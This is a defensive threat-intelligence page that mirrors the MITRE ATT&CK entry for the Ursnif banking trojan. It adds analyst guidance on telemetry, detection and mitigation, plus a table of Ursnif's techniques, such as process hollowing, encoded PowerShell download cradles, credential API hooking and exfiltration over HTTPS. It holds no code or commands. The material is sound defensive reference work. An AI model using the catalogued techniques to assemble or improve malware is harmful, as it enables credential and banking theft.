S0386: Ursnif
Ursnif is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, Spearphishing Attachments, and malicious links.[1][2] Ursnif is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.[3]
Analyst context for executives and security teams
Ursnif matters because ATT&CK describes it as a Windows banking trojan associated primarily with data theft, with variants that can include backdoor, spyware, and file-injection capabilities. For leaders, the practical issue is not just “malware detection”; it is whether email-delivered or exploit-kit-delivered malware can collect credentials and local data, communicate over web traffic, stage and exfiltrate information, and hide through obfuscation or process injection before responders have enough evidence to scope the incident.
Executive priority
Prioritize Ursnif-related readiness where Windows endpoints, email-based delivery risk, credential theft, and sensitive local data exposure would create business disruption or audit concern. Executives should ask whether the organization can prove coverage across prevention, endpoint telemetry, web/C2 monitoring, credential-access investigation, and incident response scoping. Because TA551 is documented as using Ursnif and is described as financially motivated and email-focused, security leaders should also validate phishing resilience and malware triage workflows without assuming current exposure or activity.
Technical view
SOC and IR teams should validate Windows-focused visibility across the behaviors ATT&CK relates to Ursnif: registry and service discovery, process and system discovery, PowerShell and Visual Basic execution, WMI abuse, process injection including TLS callback injection and process hollowing, credential API hooking, local data collection/staging, web-protocol C2, proxy or multi-hop proxy use, ingress tool transfer, exfiltration over C2, file deletion, removable media replication, and tainted shared content. MITRE provides no official detection text for this malware object, so detections should be behavior-led using the related techniques rather than relying only on static malware names or signatures.
Likely telemetry
- Windows endpoint process creation and command-line telemetry, including PowerShell, Visual Basic, WMI, service-query, process-query, and registry-query activity
- Endpoint detection telemetry for process injection, suspicious memory behavior, process hollowing indicators, and TLS callback-related execution where available
- Windows Registry access and modification events relevant to discovery, masquerading, and persistence-like investigation context
- File system telemetry for local data staging, encoded or encrypted files, dropped tools, deletion activity, and files placed in trusted-looking paths or shared locations
- Credential-access telemetry where available, including API hooking or suspicious access to authentication-related processes/functions
Detection direction
- Build coverage around ATT&CK behaviors related to Ursnif rather than the malware name alone, because the object notes multiple variants and components with a wide variety of behaviors.
- Correlate email delivery indicators with post-delivery Windows execution, especially script execution, WMI activity, registry/service/process discovery, and unexpected child processes from user-facing applications.
- Tune for suspicious discovery sequences on Windows endpoints, but account for administrative tools and software inventory products that may legitimately query services, processes, registry keys, and system information.
- Hunt for process-injection and process-hollowing patterns paired with outbound web traffic, file staging, or credential-access signals; these combinations are more useful than any single noisy event.
- Validate network monitoring for web-protocol C2 and proxy behavior, recognizing that malicious traffic may blend with normal HTTP/S activity and that multi-hop proxying can obscure infrastructure attribution.
Mitigation priorities
- Start with phishing and malicious-link controls, attachment detonation, user reporting, and email investigation workflows because ATT&CK describes Ursnif distribution through spearphishing attachments and malicious links.
- Harden Windows endpoints against script, WMI, and unauthorized process activity using least privilege, application control, and script-execution governance appropriate to the business environment.
- Strengthen credential protection and monitoring because related behavior includes Credential API Hooking and the malware is associated with data theft.
- Ensure EDR and centralized logging capture process, registry, file, memory-behavior, and network evidence needed for scoping, not just blocking alerts.
- Segment and monitor sensitive data locations, shared storage, and removable-media pathways where related techniques such as local data staging, tainted shared content, and removable-media replication are relevant.
Analyst notes and limits
This take is based only on the supplied ATT&CK S0386 fields, references, and relationships. The strongest defensive value comes from mapping Ursnif to its related behaviors: Windows execution and discovery, credential collection, evasion, C2 over web protocols, staging, and exfiltration. The official object does not specify tactics directly and does not provide official detection guidance, so local control validation should be technique-based.
The supplied ATT&CK object does not include official detection text, aliases, labels, or direct indicators of compromise. It identifies Windows as the platform for Ursnif, while some related techniques list broader platforms; this summary treats Ursnif readiness as Windows-centered and uses non-Windows platform references only as technique context. No claim is made about active exploitation, current campaigns, customer exposure, or guaranteed detection.
Ursnif
Ursnif is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, Spearphishing Attachments, and malicious links.[1][2] Ursnif is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.[3]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1007 | System Service Discovery | Ursnif has gathered information about running services.CitationTrendMicro Ursnif Mar 2015 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Ursnif has used Registry Run keys to establish automatic execution at system startup.CitationTrendMicro PE_URSNIF.A2CitationTrendMicro BKDR_URSNIF.SM |
| Enterprise | T1105 | Ingress Tool Transfer | |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | Ursnif has used an XOR-based algorithm to encrypt Tor clients dropped to disk.CitationProofPoint Ursnif Aug 2016 Ursnif droppers have also been delivered as password-protected zip files that execute base64 encoded PowerShell commands.CitationBromium Ursnif Mar 2017 |
| Enterprise | T1090.003 | Multi-hop Proxy Sub-technique | |
| Enterprise | T1074.001 | Local Data Staging Sub-technique | Ursnif has used tmp files to stage gathered information.CitationTrendMicro Ursnif Mar 2015 |
| Enterprise | T1106 | Native API | Ursnif has used |
| Enterprise | T1497.003 | Time Based Checks Sub-technique | Ursnif has used a 30 minute delay after execution to evade sandbox monitoring tools.CitationTrendMicro Ursnif File Dec 2014 |
| Enterprise | T1559.001 | Component Object Model Sub-technique | Ursnif droppers have used COM objects to execute the malware's full executable payload.CitationBromium Ursnif Mar 2017 |
| Enterprise | T1056.004 | Credential API Hooking Sub-technique | Ursnif has hooked APIs to perform a wide variety of information theft, such as monitoring traffic from browsers.CitationTrendMicro Ursnif Mar 2015 |
| Enterprise | T1057 | Process Discovery | Ursnif has gathered information about running processes.CitationTrendMicro Ursnif Mar 2015CitationTrendMicro BKDR_URSNIF.SM |
| Enterprise | T1041 | Exfiltration Over C2 Channel | Ursnif has used HTTP POSTs to exfil gathered information.CitationTrendMicro Ursnif Mar 2015CitationFireEye Ursnif Nov 2017CitationProofPoint Ursnif Aug 2016 |
| Enterprise | T1132 | Data Encoding | Ursnif has used encoded data in HTTP URLs for C2.CitationProofPoint Ursnif Aug 2016 |
| Enterprise | T1055.005 | Thread Local Storage Sub-technique | Ursnif has injected code into target processes via thread local storage callbacks.CitationTrendMicro Ursnif Mar 2015CitationTrendMicro PE_URSNIF.A2CitationFireEye Ursnif Nov 2017 |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Ursnif has used crypto key information stored in the Registry to decrypt Tor clients dropped to disk.CitationProofPoint Ursnif Aug 2016 |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location Sub-technique | Ursnif has used strings from legitimate system files and existing folders for its file, folder, and Registry entry names.CitationTrendMicro Ursnif Mar 2015 |
| Enterprise | T1005 | Data from Local System | Ursnif has collected files from victim machines, including certificates and cookies.CitationTrendMicro BKDR_URSNIF.SM |
| Enterprise | T1027.010 | Command Obfuscation Sub-technique | Ursnif droppers execute base64 encoded PowerShell commands.CitationBromium Ursnif Mar 2017 |
| Enterprise | T1113 | Screen Capture | Ursnif has used hooked APIs to take screenshots.CitationTrendMicro Ursnif Mar 2015CitationTrendMicro BKDR_URSNIF.SM |
| Enterprise | T1543.003 | Windows Service Sub-technique | Ursnif has registered itself as a system service in the Registry for automatic execution at system startup.CitationTrendMicro PE_URSNIF.A2 |
| Enterprise | T1059.001 | PowerShell Sub-technique | Ursnif droppers have used PowerShell in download cradles to download and execute the malware's full executable payload.CitationBromium Ursnif Mar 2017 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Ursnif has used HTTPS for C2.CitationTrendMicro Ursnif Mar 2015CitationFireEye Ursnif Nov 2017CitationProofPoint Ursnif Aug 2016 |
| Enterprise | T1070.004 | File Deletion Sub-technique | Ursnif has deleted data staged in tmp files after exfiltration.CitationTrendMicro Ursnif Mar 2015 |
| Enterprise | T1012 | Query Registry | |
| Enterprise | T1112 | Modify Registry | Ursnif has used Registry modifications as part of its installation routine.CitationTrendMicro BKDR_URSNIF.SMCitationProofPoint Ursnif Aug 2016 |
| Enterprise | T1568.002 | Domain Generation Algorithms Sub-technique | Ursnif has used a DGA to generate domain names for C2.CitationProofPoint Ursnif Aug 2016 |
| Enterprise | T1059.005 | Visual Basic Sub-technique | Ursnif droppers have used VBA macros to download and execute the malware's full executable payload.CitationBromium Ursnif Mar 2017 |
| Enterprise | T1082 | System Information Discovery | Ursnif has used Systeminfo to gather system information.CitationTrendMicro Ursnif Mar 2015 |
| Enterprise | T1090 | Proxy | Ursnif has used a peer-to-peer (P2P) network for C2.CitationNJCCIC Ursnif Sept 2016CitationProofPoint Ursnif Aug 2016 |
| Enterprise | T1047 | Windows Management Instrumentation | Ursnif droppers have used WMI classes to execute PowerShell commands.CitationBromium Ursnif Mar 2017 |
| Enterprise | T1055.012 | Process Hollowing Sub-technique | Ursnif has used process hollowing to inject into child processes.CitationFireEye Ursnif Nov 2017 |
| Enterprise | T1185 | Browser Session Hijacking | Ursnif has injected HTML codes into banking sites to steal sensitive online banking information (ex: usernames and passwords).CitationTrendMicro BKDR_URSNIF.SM |
| Enterprise | T1080 | Taint Shared Content | Ursnif has copied itself to and infected files in network drives for propagation.CitationTrendMicro Ursnif Mar 2015CitationTrendMicro Ursnif File Dec 2014 |
| Enterprise | T1091 | Replication Through Removable Media | Ursnif has copied itself to and infected removable drives for propagation.CitationTrendMicro Ursnif Mar 2015CitationTrendMicro Ursnif File Dec 2014 |
| Enterprise | T1564.003 | Hidden Window Sub-technique | Ursnif droppers have used COM properties to execute malware in hidden windows.CitationBromium Ursnif Mar 2017 |
Groups, software, and campaigns
G0127: TA551
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.5 | Current bundle | 01b386732b43… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
NJCCIC Ursnif Sept 2016
NJCCIC. (2016, September 27). Ursnif. Retrieved September 12, 2024.
Open source URL -
[2]
ProofPoint Ursnif Aug 2016
Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019.
Open source URL -
[3]
TrendMicro Ursnif Mar 2015
Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019.
Open source URL -
[4]
Dreambot
(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016)
-
[5]
FireEye Ursnif Nov 2017
Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved June 5, 2019.
Open source URL -
[6]
Gozi-ISFB
(Citation: FireEye Ursnif Nov 2017)(Citation: ProofPoint Ursnif Aug 2016)
-
[7]
PE_URSNIF
(Citation: TrendMicro Ursnif Mar 2015)
-
[8]
Ursnif
(Citation: NJCCIC Ursnif Sept 2016)
-
[9]
mitre-attack S0386Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.